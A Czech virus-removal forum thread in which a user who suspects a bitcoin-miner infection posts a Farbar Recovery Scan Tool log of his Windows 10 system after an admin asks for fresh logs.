Právě je 21 bře 2019 07:34

Odvirování PC, zrychlení počítače, vzdálená pomoc prostřednictvím služby neslape.cz

Všechny časy jsou v UTC + 1 hodina


Pravidla fóra


Pokud chcete pomoc, vložte log z FRST [návod zde] nebo RSIT [návod zde]

Jednotlivé thready budou po vyřešení uzamčeny. Stejně tak ty, které budou nečinné déle než 14 dní. Vizte Pravidlo o zamykání témat. Děkujeme za pochopení.

!NOVINKA!
Nově lze využívat služby vzdálené pomoci, kdy se k vašemu počítači připojí odborník a bližší informace o problému si od vás získá telefonicky! Více na www.neslape.cz



Odeslat nové téma Toto téma je zamknuté. Nemůžete posílat nové příspěvky ani odpovídat na starší.  [ Příspěvků: 9 ] 
Autor Zpráva
 Předmět příspěvku: bitcoin miner
PříspěvekNapsal: 11 led 2019 20:13 
Offline
Návštěvník
Návštěvník

Registrován: 10 úno 2012 14:30
Příspěvky: 8
Ahoj,
bohužel se mi mojí hloupostí podařilo stáhnout a nainstalovat malware, patrně bitcoin miner.
Při zjištění jsem okamžitě spustil malware bytes antimalware a nějaký soubory odstranil. Patrně ale ne vše, takže druhý den po spuštění mi malware zablokoval antimalware a blokuje i chrome při vyhledávání dalších antimalwarů. Spustil jsem tedy malware bytes v nouzovém režimu a k tomu přidal i adwcleaner. Opět to našlo několik souborů, ale problém stále trvá. Použil jsem si další antimalwary(Hitman Pro) nicméně to nepomohlo. Prosím o radu, přikládám logy z malware bytes, adwcleaneru i FRST.

Děkuji


Přílohy:
logy.rar [53.83 KiB]
6 krát
Nahoru
 Profil  
 
 Předmět příspěvku: Re: bitcoin miner
PříspěvekNapsal: 11 led 2019 20:53 
Offline
Site Admin
Site Admin
Uživatelský avatar

Registrován: 30 říj 2003 13:42
Příspěvky: 107885
Bydliště: Plzeň
Zdravím!
Pokud logy FRST+Addition byly sejmuty před čištěním ADWCleanerem, dejte tyto logy znovu.

_________________
Dotazy a logy vkládejte pouze do vašich threadů. Soukromé zprávy, icq a e-maily neslouží k řešení vašich problémů.

Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.

Navštivte: Obrázek

e-mail: rudy(zavináč)forum.viry.cz

Varování:
Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!


Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.


Nahoru
 Profil  
 
 Předmět příspěvku: Re: bitcoin miner
PříspěvekNapsal: 11 led 2019 22:45 
Offline
Návštěvník
Návštěvník

Registrován: 10 úno 2012 14:30
Příspěvky: 8
Omlouvám se, tady jsou poslední logy

Díky za včasnou odpověď :)

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 28.09.2018
Ran by Martin (administrator) on DESKTOP-VBSMI5O (12-01-2019 00:00:54)
Running from C:\Users\ulol\Desktop
Loaded Profiles: Martin (Available Profiles: defaultuser0 & Martin)
Platform: Windows 10 Home Version 1803 17134.523 (X64) Language: Čeština (Česko)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Safe Mode (minimal)
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/33 ... scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
(Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.1812.3-0\MsMpEng.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\smartscreen.exe
() C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.36.52.0_x64__kzf8qxf38zg5c\SkypeBackgroundHost.exe
(Microsoft Corporation) C:\Windows\HelpPane.exe
() C:\Program Files\WindowsApps\Microsoft.Getstarted_6.15.12641.0_x64__8wekyb3d8bbwe\WhatsNew.Store.exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [SecurityHealth] => C:\Program Files\Windows Defender\MSASCuiL.exe [638872 2018-04-12] (Microsoft Corporation)
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13885696 2015-06-24] (Realtek Semiconductor)
HKLM\...\Run: [StartCN] => C:\Program Files\AMD\CNext\CNext\cnext.exe [4926664 2016-02-26] (Advanced Micro Devices, Inc.)
HKLM\...\Run: [CDAServer] => C:\Program Files\Common Files\Common Desktop Agent\CDASrv.exe [464608 2014-09-08] ()
HKLM-x32\...\Run: [NetTime] => C:\Program Files (x86)\NetTime\NetTime.exe [772096 2012-05-12] ()
HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\AMD\ATI.ACE\Core-Static\amd64\CLIStart.exe [767176 2015-08-04] (Advanced Micro Devices, Inc.)
HKU\S-1-5-19\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [518144 2018-04-12] (Microsoft Corporation)
HKU\S-1-5-20\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [518144 2018-04-12] (Microsoft Corporation)
HKU\S-1-5-21-195099987-321758953-278711717-1001\...\Run: [BlueStacks Agent] => C:\Program Files (x86)\BlueStacks\HD-Agent.exe [160824 2017-05-24] (BlueStack Systems, Inc.)
HKU\S-1-5-21-195099987-321758953-278711717-1001\...\MountPoints2: {4fc3e674-a3f9-11e8-b924-50b7c3b63006} - "E:\HiSuiteDownLoader.exe"
HKU\S-1-5-21-195099987-321758953-278711717-1001\...\MountPoints2: {84ec38e4-b5a9-11e8-b92a-20898411baf6} - "E:\HiSuiteDownLoader.exe"
HKU\S-1-5-21-195099987-321758953-278711717-1001\...\MountPoints2: {84ec39f6-b5a9-11e8-b92a-20898411baf6} - "E:\HiSuiteDownLoader.exe"
HKU\S-1-5-21-195099987-321758953-278711717-1001\...\MountPoints2: {df1b3e25-3b2c-11e8-b912-50b7c3b63006} - "E:\HiSuiteDownLoader.exe"
HKU\S-1-5-21-195099987-321758953-278711717-1001\...\MountPoints2: {f6086f2d-f889-11e8-b934-50b7c3b63006} - "E:\HiSuiteDownLoader.exe"
HKU\S-1-5-21-195099987-321758953-278711717-1001\...\MountPoints2: {f608762c-f889-11e8-b934-50b7c3b63006} - "E:\HiSuiteDownLoader.exe"

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Hosts: Hosts file not detected in the default directory
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{430db6d2-4242-4c4a-bd0e-6f4a3369534d}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{942faac3-3e9a-472d-9cf4-c30e16d1a17b}: [DhcpNameServer] 192.168.1.1

Internet Explorer:
==================
SearchScopes: HKU\S-1-5-21-195099987-321758953-278711717-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2018-11-22] (Microsoft Corporation)
BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\GROOVEEX.DLL [2018-12-21] (Microsoft Corporation)
BHO-x32: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\Office16\OCHelper.dll [2018-07-17] (Microsoft Corporation)
BHO-x32: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\root\Office16\GROOVEEX.DLL [2018-12-21] (Microsoft Corporation)
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2018-07-17] (Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2018-07-17] (Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2018-07-17] (Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2018-07-17] (Microsoft Corporation)

FireFox:
========
FF DefaultProfile: fcg8p7lh.default
FF ProfilePath: C:\Users\ulol\AppData\Roaming\Mozilla\Firefox\Profiles\fcg8p7lh.default [2019-01-12]
FF Plugin: @videolan.org/vlc,version=2.2.4 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2018-08-10] (VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.4 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2018-08-10] (VideoLAN)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2018-07-17] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2018-07-17] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.23\npGoogleUpdate3.dll [2018-12-20] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.23\npGoogleUpdate3.dll [2018-12-20] (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2018-12-04] (Adobe Systems Inc.)

Chrome:
=======
CHR HomePage: Default -> hxxp://www.seznam.cz/
CHR StartupUrls: Default -> "hxxps://www.google.com/","hxxps://www.google.com/"
CHR Session Restore: Default -> is enabled.
CHR Profile: C:\Users\ulol\AppData\Local\Google\Chrome\User Data\Default [2019-01-12]
CHR Extension: (Překladač Google) - C:\Users\ulol\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapbdbdomjkkjkaonfhkkikfgjllcleb [2017-10-20]
CHR Extension: (Dokumenty) - C:\Users\ulol\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-10-13]
CHR Extension: (Disk Google) - C:\Users\ulol\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2017-02-01]
CHR Extension: (CLONE, BOUNTY HUNTER, STORM TROOPER) - C:\Users\ulol\AppData\Local\Google\Chrome\User Data\Default\Extensions\bimnpejnapnbhiphakfmkhnnaoemofbe [2017-02-01]
CHR Extension: (YouTube) - C:\Users\ulol\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-02-01]
CHR Extension: (Dokumenty Google offline) - C:\Users\ulol\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2018-08-23]
CHR Extension: (AdBlock) - C:\Users\ulol\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2018-12-12]
CHR Extension: (Bandzone Downloader) - C:\Users\ulol\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdolellaicjnehmfidkjkkehmkkapngp [2017-11-09]
CHR Extension: (Platby Internetového obchodu Chrome) - C:\Users\ulol\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-04-03]
CHR Extension: (Gmail) - C:\Users\ulol\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-02-01]
CHR Extension: (Chrome Media Router) - C:\Users\ulol\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2018-12-19]
CHR Profile: C:\Users\ulol\AppData\Local\Google\Chrome\User Data\System Profile [2017-11-18]
CHR HKU\S-1-5-21-195099987-321758953-278711717-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [bbjllphbppobebmjpjcijfbakobcheof] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 BstHdAndroidSvc; C:\Program Files (x86)\BlueStacks\HD-Service.exe [387128 2017-05-24] (BlueStack Systems, Inc.)
S3 BstHdLogRotatorSvc; C:\Program Files (x86)\BlueStacks\HD-LogRotatorService.exe [369720 2017-05-24] (BlueStack Systems, Inc.)
S3 BstHdPlusAndroidSvc; C:\Program Files (x86)\BlueStacks\HD-Plus-Service.exe [406584 2017-05-24] (BlueStack Systems, Inc.)
S2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [8522536 2018-12-10] (Microsoft Corporation)
S3 GoogleChromeElevationService; C:\Program Files (x86)\Google\Chrome\Application\71.0.3578.98\elevation_service.exe [443872 2018-12-12] (Google Inc.)
S2 HitmanProScheduler; C:\Program Files\HitmanPro\hmpsched.exe [136512 2019-01-11] (SurfRight B.V.)
S2 HuaweiHiSuiteService64.exe; C:\Program Files (x86)\HiSuite\HandSetService\HuaweiHiSuiteService64.exe [190784 2018-11-19] () [File not signed]
S2 igfxCUIService1.0.0.0; C:\WINDOWS\system32\igfxCUIService.exe [319096 2017-05-18] (Intel Corporation)
R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [6347056 2018-09-19] (Malwarebytes)
S2 NetTimeSvc; C:\Program Files (x86)\NetTime\NetTimeService.exe [473088 2012-05-12] () [File not signed]
S2 Samsung Printer Dianostics Service; C:\WINDOWS\SysWOW64\\spdsvc.exe [499000 2016-07-17] ()
S4 ssh-agent; C:\WINDOWS\System32\OpenSSH\ssh-agent.exe [495616 2018-03-10] ()
S2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [256120 2016-02-01] (Synaptics Incorporated)
S3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1812.3-0\NisSrv.exe [3880120 2018-12-11] (Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1812.3-0\MsMpEng.exe [114208 2018-12-11] (Microsoft Corporation)

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 amdkmafd; C:\WINDOWS\System32\drivers\amdkmafd.sys [23240 2016-02-26] (Advanced Micro Devices, Inc.)
R0 amdkmpfd; C:\WINDOWS\System32\drivers\amdkmpfd.sys [79736 2017-09-20] (Advanced Micro Devices, Inc.)
S3 Andbus; C:\WINDOWS\System32\drivers\lgandbus64.sys [19456 2012-03-02] (LG Electronics Inc.)
S3 AndDiag; C:\WINDOWS\System32\drivers\lganddiag64.sys [27648 2012-03-02] (LG Electronics Inc.)
S3 AndGps; C:\WINDOWS\System32\drivers\lgandgps64.sys [27136 2012-03-02] (LG Electronics Inc.)
S3 AndNetDiag2; C:\WINDOWS\System32\drivers\lgandnetdiag264.sys [30720 2015-01-26] (LG Electronics Inc.)
S3 AndNetGps; C:\WINDOWS\System32\drivers\lgandnetgps64.sys [29184 2015-01-21] (LG Electronics Inc.)
S3 BstHdDrv; C:\Program Files (x86)\BlueStacks\HD-Hypervisor-amd64.sys [152672 2017-05-24] (BlueStack Systems)
S3 BstkDrv; C:\Program Files (x86)\BlueStacks\BstkDrv.sys [270904 2017-05-22] (Bluestack System Inc. )
S3 dg_ssudbus; C:\WINDOWS\System32\drivers\ssudbus.sys [130688 2016-07-22] (Samsung Electronics Co., Ltd.)
S3 edrsensor; C:\WINDOWS\System32\DRIVERS\edrsensor.sys [294000 2018-10-09] (BitDefender S.R.L. Bucharest, ROMANIA)
S3 ew_usbccgpfilter; C:\WINDOWS\System32\drivers\ew_usbccgpfilter.sys [18944 2018-11-19] (Huawei Technologies Co., Ltd.)
S3 hitmanpro37; C:\WINDOWS\system32\drivers\hitmanpro37.sys [55232 2019-01-11] ()
U5 hw_usbdev; C:\Windows\System32\Drivers\hw_usbdev.sys [116864 2018-11-19] (Huawei Technologies Co., Ltd.)
R3 MBAMSwissArmy; C:\WINDOWS\System32\Drivers\mbamswissarmy.sys [261032 2019-01-11] (Malwarebytes)
S3 Microsoft_Bluetooth_AvrcpTransport; C:\WINDOWS\system32\DRIVERS\Microsoft.Bluetooth.AvrcpTransport.sys [46592 2018-04-12] (Microsoft Corporation)
R3 RadioHIDMini; C:\WINDOWS\System32\drivers\RadioHIDMini.sys [32168 2015-07-16] (Windows (R) Win 7 DDK provider)
S3 rt640x64; C:\WINDOWS\System32\drivers\rt640x64.sys [886528 2000-01-01] (Realtek )
R3 RTSUER; C:\WINDOWS\system32\Drivers\RtsUer.sys [402136 2000-01-01] (Realsil Semiconductor Corporation)
R3 SmbDrvI; C:\WINDOWS\system32\DRIVERS\Smb_driver_Intel.sys [33960 2000-01-01] (Synaptics Incorporated)
S3 ssudcdf; C:\WINDOWS\System32\drivers\ssudcdf.sys [36608 2014-01-22] (DEVGURU Co., LTD.(www.devguru.co.kr))
S3 ssuddmgr; C:\WINDOWS\System32\drivers\ssuddmgr.sys [206080 2014-01-22] (DEVGURU Co., LTD.(www.devguru.co.kr))
S3 ssudobex; C:\WINDOWS\System32\drivers\ssudobex.sys [206080 2014-01-22] (DEVGURU Co., LTD.(www.devguru.co.kr))
S3 ssudqcfilter; C:\WINDOWS\System32\drivers\ssudqcfilter.sys [64640 2016-07-22] (QUALCOMM Incorporated)
S3 ssudrmnet; C:\WINDOWS\System32\drivers\ssudrmnet.sys [70400 2014-01-22] (DEVGURU Co., LTD.)
S3 ssudserd; C:\WINDOWS\System32\drivers\ssudserd.sys [206080 2014-01-22] (DEVGURU Co., LTD.(www.devguru.co.kr))
S3 ss_conn_usb_driver; C:\WINDOWS\System32\Drivers\ss_conn_usb_driver.sys [26368 2014-01-22] (DEVGURU Co., LTD.)
S3 usbbus; C:\WINDOWS\System32\drivers\lgx64bus.sys [17920 2014-11-17] (LG Electronics Inc.)
S3 UsbDiag; C:\WINDOWS\System32\drivers\lgx64diag.sys [28160 2014-11-21] (LG Electronics Inc.)
S3 UsbGps; C:\WINDOWS\System32\drivers\lgx64gps.sys [27136 2014-11-17] (LG Electronics Inc.)
S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [46680 2018-12-11] (Microsoft Corporation)
S0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [330936 2018-12-11] (Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [62136 2018-12-11] (Microsoft Corporation)
U2 bddci; no ImagePath

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2019-01-11 23:59 - 2019-01-11 23:59 - 000261032 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamswissarmy.sys
2019-01-11 23:24 - 2019-01-11 23:24 - 000012872 _____ (SurfRight B.V.) C:\WINDOWS\system32\bootdelete.exe
2019-01-11 23:07 - 2019-01-11 23:35 - 000055232 _____ C:\WINDOWS\system32\Drivers\hitmanpro37.sys
2019-01-11 23:01 - 2019-01-11 23:02 - 000007593 _____ C:\Users\ulol\AppData\Local\Resmon.ResmonCfg
2019-01-11 22:44 - 2019-01-11 22:44 - 000025200 _____ C:\Users\ulol\Desktop\frst.rar
2019-01-11 20:12 - 2019-01-11 20:12 - 000055127 _____ C:\Users\ulol\Desktop\logy.rar
2019-01-11 20:10 - 2019-01-11 20:12 - 000049304 _____ C:\Users\ulol\Desktop\Addition.txt
2019-01-11 20:07 - 2019-01-12 00:02 - 000015218 _____ C:\Users\ulol\Desktop\FRST.txt
2019-01-11 19:40 - 2019-01-11 19:34 - 000000000 ____D C:\Users\ulol\Desktop\logy
2019-01-11 19:33 - 2019-01-12 00:00 - 000000000 ____D C:\FRST
2019-01-11 19:19 - 2019-01-11 19:19 - 002414080 _____ (Farbar) C:\Users\ulol\Desktop\FRST64.exe
2019-01-11 19:04 - 2019-01-11 19:04 - 000000000 ____D C:\Users\ulol\Desktop\cce_2.5.242177.201_x32
2019-01-11 14:17 - 2019-01-11 14:17 - 000000000 ____D C:\Users\ulol\AppData\Roaming\adaware
2019-01-11 14:17 - 2019-01-11 14:17 - 000000000 ____D C:\Users\ulol\AppData\Local\AdAwareDesktop
2019-01-11 14:13 - 2019-01-11 14:13 - 000000000 ____D C:\Program Files (x86)\adaware
2019-01-11 14:12 - 2019-01-11 14:12 - 000000000 ____D C:\Users\ulol\AppData\Local\AdAwareUpdater
2019-01-11 14:12 - 2019-01-11 14:12 - 000000000 ____D C:\Program Files\Common Files\adaware
2019-01-11 14:11 - 2019-01-11 14:11 - 000000000 ____D C:\ProgramData\adaware
2019-01-11 14:10 - 2019-01-11 23:24 - 000000000 ____D C:\ProgramData\HitmanPro
2019-01-11 14:10 - 2019-01-11 14:10 - 000001958 _____ C:\Users\Public\Desktop\HitmanPro.lnk
2019-01-11 14:10 - 2019-01-11 14:10 - 000000000 ____D C:\Program Files\HitmanPro
2019-01-11 13:46 - 2019-01-11 23:59 - 000000214 _____ C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job
2019-01-11 13:45 - 2019-01-12 00:00 - 000891156 _____ C:\WINDOWS\ntbtlog.txt
2019-01-11 13:34 - 2019-01-11 13:34 - 000000080 ___SH C:\bootTel.dat
2019-01-11 13:25 - 2019-01-11 13:55 - 000000000 ____D C:\AdwCleaner
2019-01-11 13:25 - 2019-01-11 13:25 - 007320272 _____ (Malwarebytes) C:\Users\ulol\Desktop\adwcleaner_7.2.6.0.exe
2019-01-11 11:32 - 2019-01-11 12:13 - 373444054 _____ C:\Users\ulol\Desktop\Vikings 5x17 - S05E17 CZ titulky v obraze.avi
2019-01-11 11:20 - 2019-01-11 11:20 - 006161408 _____ C:\Users\ulol\AppData\Local\dump007.dat
2019-01-11 11:19 - 2019-01-11 11:19 - 000003688 _____ C:\WINDOWS\System32\Tasks\kuaejfar
2019-01-11 11:19 - 2019-01-11 11:19 - 000003470 _____ C:\WINDOWS\System32\Tasks\gcknyzn
2019-01-11 11:19 - 2019-01-11 11:19 - 000000009 _____ C:\Users\ulol\rstr2.ini
2019-01-10 17:53 - 2019-01-10 17:53 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2019-01-10 17:53 - 2018-12-04 08:09 - 000152688 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbae64.sys
2019-01-10 17:46 - 2019-01-10 17:46 - 000000008 _____ C:\ProgramData\ts.dat
2019-01-10 17:46 - 2019-01-10 17:46 - 000000004 _____ C:\ProgramData\lock.dat
2019-01-10 17:46 - 2019-01-10 17:46 - 000000004 _____ C:\ProgramData\irw.atsd
2019-01-10 17:29 - 2019-01-10 17:29 - 000003604 _____ C:\WINDOWS\System32\Tasks\{C1E14D40-9F1F-EBBD-1E08-51865EAFA95A}
2019-01-10 17:29 - 2019-01-10 17:29 - 000000004 _____ C:\ProgramData\ext.dat
2019-01-10 17:29 - 2019-01-10 17:29 - 000000003 _____ C:\Users\ulol\AppData\Local\wbem.ini
2019-01-10 17:28 - 2019-01-10 17:22 - 000000000 ____D C:\Program Files (x86)\DCOL
2019-01-10 17:26 - 2019-01-10 17:26 - 000000000 ____D C:\Users\ulol\AppData\LocalLow\MAL
2019-01-10 17:12 - 2019-01-10 17:12 - 000057640 _____ C:\ProgramData\agent.uninstall.1547136713.bdinstall.v2.bin
2019-01-09 12:59 - 2019-01-01 14:46 - 012710912 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2019-01-09 12:59 - 2019-01-01 14:43 - 001364992 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcastdvruserservice.dll
2019-01-09 12:59 - 2019-01-01 14:20 - 011902976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2019-01-09 12:59 - 2019-01-01 08:14 - 001221432 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe
2019-01-09 12:59 - 2019-01-01 08:14 - 001029944 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe
2019-01-09 12:59 - 2019-01-01 08:14 - 000566568 _____ (Microsoft Corporation) C:\WINDOWS\system32\tcblaunch.exe
2019-01-09 12:59 - 2019-01-01 08:13 - 003292152 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll
2019-01-09 12:59 - 2019-01-01 08:13 - 001363536 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinTypes.dll
2019-01-09 12:59 - 2019-01-01 08:12 - 009084216 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2019-01-09 12:59 - 2019-01-01 08:12 - 007520104 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2019-01-09 12:59 - 2019-01-01 08:12 - 002765344 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2019-01-09 12:59 - 2019-01-01 08:12 - 002465792 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml6.dll
2019-01-09 12:59 - 2019-01-01 08:12 - 002421288 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys
2019-01-09 12:59 - 2019-01-01 08:12 - 000268304 _____ (Microsoft Corporation) C:\WINDOWS\system32\browserbroker.dll
2019-01-09 12:59 - 2019-01-01 07:55 - 025856512 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2019-01-09 12:59 - 2019-01-01 07:50 - 022715392 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2019-01-09 12:59 - 2019-01-01 07:50 - 004383744 _____ (Microsoft Corporation) C:\WINDOWS\system32\EdgeContent.dll
2019-01-09 12:59 - 2019-01-01 07:47 - 000808448 _____ (Microsoft Corporation) C:\WINDOWS\system32\EdgeManager.dll
2019-01-09 12:59 - 2019-01-01 07:47 - 000433152 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotification.exe
2019-01-09 12:59 - 2019-01-01 07:45 - 007573504 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2019-01-09 12:59 - 2019-01-01 07:45 - 002368512 _____ (Microsoft Corporation) C:\WINDOWS\system32\WebRuntimeManager.dll
2019-01-09 12:59 - 2019-01-01 07:44 - 001549824 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
2019-01-09 12:59 - 2019-01-01 07:44 - 000894464 _____ (Microsoft Corporation) C:\WINDOWS\system32\webplatstorageserver.dll
2019-01-09 12:59 - 2019-01-01 07:44 - 000662528 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlidprov.dll
2019-01-09 12:59 - 2019-01-01 07:44 - 000456192 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Graphics.Printing.Workflow.dll
2019-01-09 12:59 - 2019-01-01 07:43 - 001805312 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2019-01-09 12:59 - 2019-01-01 07:42 - 004939776 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2019-01-09 12:59 - 2019-01-01 07:42 - 002247680 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlidsvc.dll
2019-01-09 12:59 - 2019-01-01 07:42 - 001371136 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadtb.dll
2019-01-09 12:59 - 2019-01-01 07:42 - 000717312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Web.dll
2019-01-09 12:59 - 2019-01-01 07:41 - 001159680 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpcss.dll
2019-01-09 12:59 - 2019-01-01 07:41 - 000505344 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgeIso.dll
2019-01-09 12:59 - 2019-01-01 07:37 - 006571584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2019-01-09 12:59 - 2019-01-01 07:37 - 002478664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll
2019-01-09 12:59 - 2019-01-01 07:37 - 002253696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2019-01-09 12:59 - 2019-01-01 07:37 - 001989040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml6.dll
2019-01-09 12:59 - 2019-01-01 07:29 - 022016512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2019-01-09 12:59 - 2019-01-01 07:22 - 019405312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
